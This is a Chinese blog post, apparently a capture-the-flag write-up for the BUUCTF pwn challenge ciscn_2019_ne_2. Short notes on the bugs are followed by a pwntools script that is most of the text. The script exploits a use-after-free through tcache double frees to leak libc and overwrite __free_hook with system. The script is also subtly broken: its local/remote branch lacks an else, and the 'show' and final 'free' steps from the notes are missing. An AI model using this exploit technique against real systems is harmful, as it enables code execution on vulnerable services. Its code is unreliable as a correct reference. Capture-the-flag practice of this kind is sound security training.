[BUUCTF-pwn] ciscn_2019_ne_2



  1. c++写的程序,反汇编后一个字符串有1米长
  2. 冒: 6个字符依次或或6-1得到 H@QRPN
  3. free未清指针


  1. 输入"NEUQRO" 开始
  2. 建80,70,10(/bin/sh\x00)
  3. free90 八次 70两次 show 0得到libc
  4. 建70 三次,依次写free_hook,x,system
  5. free 1
from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xe31ee]
    offset = 0x3b12a0  #__libc_IO_vtables:00000000003B12A0 _IO_file_jumps
    p = remote('node4.buuoj.cn', 25510) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5, 0x4f322, 0x10a38c]
    offset = 0x3e82a0  #__libc_IO_vtables:00000000003E82A0 _IO_file_jumps

#  [print(chr(v^(6-i)), end='') for i,v in enumerate(b'H@QRPN')]
p.sendlineafter(b'name', b"NEUQRO")  

menu = b'> \n'
def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b'input the size \n', str(size).encode()) #<=0x100
    p.sendlineafter(b"now you can input something...\n", msg)

def free(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'input the index\n', str(idx).encode()) # UAF

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'input the index\n', str(idx).encode()) 

add(0x80, b'A')
add(0x10, b'/bin/sh\x00')
add(0x70, b'A')
[free(2) for _ in range(2)]
[free(0) for _ in range(8)]
malloc_hook = u64(p.recvuntil(b'\x7f', drop=False).ljust(8, b'\x00')) - 0x60 -0x10
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
system    = libc_base + libc_elf.sym['system']
free_hook = libc_base + libc_elf.sym['__free_hook']
print('libc:', hex(libc_base))

context.log_level = 'debug'
add(0x70, p64(free_hook))
add(0x70, b'A')
add(0x70, p64(system))

p.sendline(b'cat /flag')

上一篇:[BUUCTF-pwn] fl0ppy_codegate_2016

下一篇:画布 多张图片合成二维码推广图